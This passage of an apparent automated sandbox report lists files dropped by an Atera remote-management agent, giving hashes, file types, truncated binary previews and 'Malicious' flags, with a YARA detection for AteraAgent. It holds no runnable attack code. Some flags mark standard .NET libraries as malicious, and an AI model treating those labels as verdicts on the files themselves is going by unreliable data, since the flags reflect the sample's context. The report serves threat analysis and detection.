                                                                                                                                                                                                                                        SSDEEP:384:1qPstMu7M72kNyb8E9VF6IYinAM+oCiSFDKJup:1vMuo7/EpYinAMxCbeup
                                                                                                                                                                                                                                        MD5:C9A5D57AF074418532A591B4443AD16F
                                                                                                                                                                                                                                        SHA1:4F99922845AF05C64B36BC71FD34468683B389D6
                                                                                                                                                                                                                                        SHA-256:322D41E1890A28359ED05AC7C3973C2CA3532CB77F8D0646B982A76FE0A68EE0
                                                                                                                                                                                                                                        SHA-512:461CCFF9F349E6F8BE27F50C54464CA65AEC23DF6C4DEFB5A4AB085F8239899CE88B2C0B2764020807826C92BB2F757DCF39733721595E80C2AAA5A75718D9B7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f.........."...0..............4... ...@....@.. ..............................8/....`.................................d4..O....@............... ..0(...`......,3............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H.......(#..............................................................6.(.....(....*...0..........s....%r...po......o......&..*....................0..%.......r!..p.s.......o.......,..o.......&..*.......................!!.......0..........r_..p(......i...r...p(....*....r...p....s.....r_..p(.....o.... ....(.....s........(....-.........o.....o.....o....(.......l&..-.s....%.o....%r...po.......L....(....o....&..&...o....,%.o....( ...-..o....(!...,..o....(".....,..o.....*....4..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):500
                                                                                                                                                                                                                                        Entropy (8bit):5.044946190927216
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VOD9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsHPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:5EF8C402347FEC5555700DB9D649C349
                                                                                                                                                                                                                                        SHA1:2E70D02943060011AF38D9200B3461206F56933D
                                                                                                                                                                                                                                        SHA-256:718459DA91EB82BD0ED8AD24CC3EABFCA61D1B5C1D9060111F85CC7D84BADCCA
                                                                                                                                                                                                                                        SHA-512:F2650D2C604459E674810BDA95C37D3FE7747CF67B5736C4275DA91576B36F3FF882FD3F8A5F0591CDF335E935DB716BE827821333297F719C26B1152BCB4D6F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.676917265704932
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqpodH3T:tuhMaVmzDC67EpYinAMxCWH3T
                                                                                                                                                                                                                                        MD5:F2016790A63364276B5DE090FF0D9516
                                                                                                                                                                                                                                        SHA1:C99BDCCD05A8813E6DEECCDFA0FD675FDC57A488
                                                                                                                                                                                                                                        SHA-256:662DC69A05611BEA25F993F4D249C83340C2F468E9564CA625027A1EA9C84E9A
                                                                                                                                                                                                                                        SHA-512:41CBB8D586AEACC6E9C156561A4C92EF30C3D50B8D4A91C2A0A41E186891C61776E102AC5DEB95A854C2241734A854320B49A0E0A05F20ECBCDB8A0F7E55980E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ...............................\....@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64048
                                                                                                                                                                                                                                        Entropy (8bit):6.268502105017609
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:BYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1JEpYinAMxC7z1:BKC9niwOepJ6TJPeb6NIUy7HxUz1
                                                                                                                                                                                                                                        MD5:9B1EA8A460CDBE957FD464E52CB74F9C
                                                                                                                                                                                                                                        SHA1:34574DE2F45BDA8A68F49C031A80476D6E6B711F
                                                                                                                                                                                                                                        SHA-256:41046ADC0E23A6A673C6DDD890C4B43F21A615D470886D59FC436B09B994E7A8
                                                                                                                                                                                                                                        SHA-512:A99E6C7829C4B6994E8AFDB4538DD8954DCFF96F2C59D62FFC91DA2E833F777F870A2F55A60CADBBED97ABA0F6411D6D40DE33D295491B2AEB45CDC51D485003
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@......*.....`.................................k...O....... ...............0(... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.17978189203311
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:2P3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IlU:2h0qjC5RMOHO420kN1P
                                                                                                                                                                                                                                        MD5:8D61BFC6E305850F082B2A4FAED267B8
                                                                                                                                                                                                                                        SHA1:543224920E68C0C7B28C9411ECE8B9F8EAFA7DE3
                                                                                                                                                                                                                                        SHA-256:B7EF8E721E39ACE9C8C4B4C4490AE5042634637D24DB4A70AF33D29DC4EC5C10
                                                                                                                                                                                                                                        SHA-512:6AA0C22B6CBD1942AD74386919D8E4F0F69FF47FC97103BDAD3FE029E9137C51DAC70CDB84275AE779965E461BC992DE96028B92A3DB8F0D26B8B53A547CA09E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......t.....@.................................3...O.... ..0...............0(...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.63676850357766
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:7TO9dQWXYW8aVNyb8E9VF6IYinAM+oCJF08IoP:7Cn6CEpYinAMxCk8jP
                                                                                                                                                                                                                                        MD5:F6E07CB084C3B287E2D2525A597A4D0C
                                                                                                                                                                                                                                        SHA1:E9191698963EA0613747BC24842DF8C37E6FBE84
                                                                                                                                                                                                                                        SHA-256:D24366C19E9DFE77B7EA94546F336F20CF8F574F838F68EBB2179C6CBFE4F25A
                                                                                                                                                                                                                                        SHA-512:5AC38F55D0045BFDB9951154E87ED30E98B200C148897E7BD3C19BEFDA634437A1EC5AA2088CE99F0E17644069EEA93E97AE1DA00DB5746C4784228FE35E1725
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^...........!.................1... ...@....@.. ....................................@..................................1..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H........#......................P ......................................O..q.<.P$[p.;a<...Ci......K..!..&.d...FaLJ.....f..........w.E.E........(y...,.Lr..R..........T.z....5..;.. ....&V.=}.... .0.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0................*..0...............*...0...............*...0..........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3207427
                                                                                                                                                                                                                                        Entropy (8bit):7.999886786110029
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:Ybr4+uFjbIPqW9rXP79t0lkGdDrEzz1+2iUPyW5GR9eSjYLKfbrLdo4xQOy2U43I:Y9u1GqWDt0lkYv/2OaG265rLSOHpjAeY
                                                                                                                                                                                                                                        MD5:3DB366E996EAE1F8DD3F01BF9172C9EA
                                                                                                                                                                                                                                        SHA1:34F2FC320F7B699B917BEBC82FE90DE8DE24BFBD
                                                                                                                                                                                                                                        SHA-256:907988CAD71E5E2702BF061EAD1AC33B63E90E7C1723198EC5A743EDAD99370C
                                                                                                                                                                                                                                        SHA-512:BA2FB12A3B6877220B44EE5891D20AB0A0736A3E1C79CE16F1EC12879627185DFA7DBE81AA8FF873F47EA3D825EA9FE5BEC7894E1E4795BEC1ADCB68BE7D5550
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......L=Y.........../...AgentPackageTicketing/AgentPackageTicketing.exe....0........H.......u..R..F.h1...N. ...6.....v...83.0y.|.l.t..Z...[s.>...j......v.DE......,R.G..'\..vr..:......Yb:H.|;.....`=.^*-S.....vC...+..$...4s:=.|...Sy....._Q`....m.@d.V._&...l%E...{....]...#..8..8........!x.....16..<_...l.%...W..Z...@I..S...U.).VTE...............-...^o.......e..V..!....&I.IM[...A......j..&..k@.m....e.;........H........3.?B{Vu7757....'."....:d..?....W.K'..6b.J.4..G.9J/.;.rt=..h.&....k.r.g?...c.`.B.IfNw..X*B1....N6.:.i.C`.KY..r^.m..F.@..e.<.&....^.C...w5......$_k.....!!.M....G........".au.f...2g._.B.O..L.p.&$......f9..*$%,...g....l....H|.+`..u....s.g..~..c........./9 w.W.9..1.w~D.x........{G.S...&..v...o.....~]2..&.?.g...\.&.#|1....].\.(E...Vg..T.\.u.Z....L.z...z.......yL....Z..8...........,.?D..e.....vi.....a.......h..,l.Z..s...9..0.E.F.O.J75..N.'n. ..3B....:.4...G.....&H....'..q..OV./5UT,E..6...S...o.X.5.l.>...uA.VS.x.....:..X1W.].Z@..V.......B..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33328
                                                                                                                                                                                                                                        Entropy (8bit):6.281012266252755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1Kj5tGG8qWsAWikfoG75yd1pjWpO6sRjBMlYXeNyb8E9VF6IYinAM+oCTIRG:Q18PlFAmaCNByYXmEpYinAMxCB
                                                                                                                                                                                                                                        MD5:B39264220D20A5C2807CDA3EA5F6B772
                                                                                                                                                                                                                                        SHA1:297845D96849058DC3216117FB6BB85CFA2DD168
                                                                                                                                                                                                                                        SHA-256:2B7C0ABDC32E7D8892A86EAF3E5E5183AE1601CE27518654F70B6EDF737AE2C1
                                                                                                                                                                                                                                        SHA-512:E715F165806FF0DF1C33397BC778890322C65E22DD42D8922F693461DE5407AB5C7D9C38709852DBF3A6E09756C0F88D2AFEA5AD847DD1A00737ECE4DE57AF21
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..N.........."l... ........@.. ....................................`..................................k..O.......4............Z..0(...........j............................................... ............... ..H............text...(L... ...N.................. ..`.rsrc...4............P..............@..@.reloc...............X..............@..B.................l......H........4..|6...........................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o......s....%.o........o......s...........s....%......io....%o......o........o....o......(....*..0..........r...p... .....r...p.(.....o......(.....o.......(...........s......[o......s....%.o........o .......s!..........s.......i.......%......io".......o....o....(.........o#...*..($...*...0..t.......(.....(%...(....,.*(....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1062
                                                                                                                                                                                                                                        Entropy (8bit):5.04288182607063
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:3sIk7O7RgdjdgFSagFw
                                                                                                                                                                                                                                        MD5:D82D26318224097C2B13F43E879DA855
                                                                                                                                                                                                                                        SHA1:4626369E38B4505371D1376FB9A50B401B21A7E3
                                                                                                                                                                                                                                        SHA-256:1BE14A97E8F1FFC962C060B76FFAC47298D02680F235097CABF378EDB3EA34D6
                                                                                                                                                                                                                                        SHA-512:5E3B09D12E5FEFB6B82DB7E19A3D856D02C683B211F18CEBABC0A6FBEA9B3E84BCFAF414C7DF043F986F78A85DB8A22D4584DCAEBE59CDC0A527D7636B31886A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXck:WB7
                                                                                                                                                                                                                                        MD5:4285039ACC7EF979D91D2FE67A56D947
                                                                                                                                                                                                                                        SHA1:4FC20A3600872C14EE506013057CCE226B5BE03B
                                                                                                                                                                                                                                        SHA-256:6781395B6CE9938A1669FDEE0C0A1EFB355D12C7DC78AD0338B90E041AA1B730
                                                                                                                                                                                                                                        SHA-512:801D94822ABF39D4C7CA5A82A2F9DF4E1A1BAF747B27FBA7147FF122C6DC58525C7AE93360109C365A76121DF3C31EEBA37801D101CF3EC44709B3F59527E529
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=29.5

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):99376
                                                                                                                                                                                                                                        Entropy (8bit):6.18918954237505
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:TlAttsLnppOphwrfNIkZP0kLv+ghDBzmItlVYlkL5ihaO40QhflQCxhB7HxL:ToESpOPptPkW5ihaOdQhfhBJ
                                                                                                                                                                                                                                        MD5:ABFC0A3DC178AA77AD97FED20A6B9478
                                                                                                                                                                                                                                        SHA1:16AABB2AD5B0D489856F54E2727B8FB49D08FCAF
                                                                                                                                                                                                                                        SHA-256:FD8D5C84A13272537F4D5D102A4B98AA8CEA9383DE6F1AECC2A2F883BA8B7349
                                                                                                                                                                                                                                        SHA-512:9775C40F97B5AE515B02A0AA311299209BD3299C6183FF2DCA5C05D713BD9E50E4BF051F4512855A0C01F65635475A8A54C303AD4CA2DB498E998D1C6B86EA1A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}KMe.........." ..0..R...........q... ........... ..............................S.....`.................................<q..O.......D............\..0(...........p............................................... ............... ..H............text....Q... ...R.................. ..`.rsrc...D............T..............@..@.reloc...............Z..............@..B................pq......H........o...............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145456
                                                                                                                                                                                                                                        Entropy (8bit):6.204144467327923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:FRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIh6:b9XeDmzV2yzlhKLFU1lLVp1+2flYFsr
                                                                                                                                                                                                                                        MD5:B63E085823C5D8C6E9A44C7FAD2E0238
                                                                                                                                                                                                                                        SHA1:78A38625C24431CCEC7F047775D84EBE04CC2E48
                                                                                                                                                                                                                                        SHA-256:1E3645669ED8536F57436637B1C2F1F75787B674FC3D78A3916479065EB05D83
                                                                                                                                                                                                                                        SHA-512:E855BB0BC8B6A0CAD4F831AC6516CF81E112C1EF150025B1C3F6D5867CB7E2C51D97F2DB6E2E40A6765AC2CECB0B82B54882AED001579215EFD5DB4AA054236A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nI..........." ..0.............v$... ...@....... ....................................`.................................#$..O....@..|...............0(...`......,#..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................W$......H.............................."......................................V!.b.....s&........*..{....*"..}....*..0..Z........(....o'...-.r...ps(...zs......(....o)....+..o*.....o.....o0...o+....o....-....,..o......*........*.$N......J.s,...}.....(-...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(D...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(E...%.(....o"...%.(....o$...%.(....o ...%.o....*..(-...*..{....*"..}....*..{ ...*"..} ...*..{!...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29232
                                                                                                                                                                                                                                        Entropy (8bit):6.6747758033899105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lmYaXzmSJL6guJrdvc5tIZmQCaBj4QU3hOTVTDvAGvoOCcdcOFyF61Nyb8E9VF6W:3SJh5tIYQzT5zyF6REpYinAMxCx+R
                                                                                                                                                                                                                                        MD5:1D556B37E30CA94B43504B34B74DA36A
                                                                                                                                                                                                                                        SHA1:71A4165BDDE78F8E639439E9C389C49BCDBB0484
                                                                                                                                                                                                                                        SHA-256:D6D95F59C970D11FBF8C62CECBD92AA7750BBEE92326F8E20558922375484FE3
                                                                                                                                                                                                                                        SHA-512:D992D518A3DE1D1758FBB866397C5847A0DA796A8F6A73F58731A5D91FF3A7BB809C9C601D3D508BD83A33A8B2DC03C985BA7AEB15E4777894BDCA50A097BF01
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p;_f.........." ..0..B..........Na... ........... ....................................@..................................`..S....................J..0(........................................................... ............... ..H............text...TA... ...B.................. ..`.rsrc................D..............@..@.reloc...............H..............@..B................0a......H....... 3...-.........../.......2.........................................}.....(......}.......(..... ....(..... ....(.....(....o....*"..(....*..(....*...(.....{....,..+..+.-..{.....o....o....*...0..?.........+..o....,..+..+.-..o....o....,..+..+.-..*.o......,..+..+.-..*..0..J.........(.....(....,..+..+.-2.{.....3#.{....,..+..+.-....s....}.....(.....(....*j....$...s..........(....&*z.{....,..+..+.-..(......(....*..{....*.0...........{.....;.....(....,..+..+.-...}....*.{....,.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):219184
                                                                                                                                                                                                                                        Entropy (8bit):6.063112831528192
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:CYq80gPJle2CpcKyudA1+PVtMG8e7sw9CcHvhln:CYqqbe2CSod5dtM8ww7PL
                                                                                                                                                                                                                                        MD5:A612E23AC94A46014969EC041CCC792D
                                                                                                                                                                                                                                        SHA1:C88D06BD33D2C5A0D83F2770D1EC5210065FB449
                                                                                                                                                                                                                                        SHA-256:50EE396DF8140433A6672663E8BDE4BFA3DDEC71B805F32025B68DCBD9BB56CC
                                                                                                                                                                                                                                        SHA-512:EFCF2423C17F0143A05A8252A3198476DC6EF8235634A84E5C1D0F4FA708E7A89102F5F2D827D1F7AED7D4F400F16EEBEB34FA09F458059F1C13ACB48DDA05F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j;_f.........." ..0..(...........F... ........... ...............................$....@.................................dF..W....`...............0..0(........................................................... ............... ..H............text....&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................F......H........S.......................S.......................................r...p(................s.........*...0...........o.....=3A.o......o......,..+..+.-.....o......(F.....,..+..+.:B......oK...*.o.... 7...@........o.......o.....o.....o........(F.......,..+..+.:t.....{f...,..+..+.-......-\.o........([.......~....(....,..+..+.-5.o........oF........ob.......,..+..+.-.....}f.....&......o.......o....*.o.....\3%.o.......o.......t......(......o....*.o.....]33.o.........1&.o........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
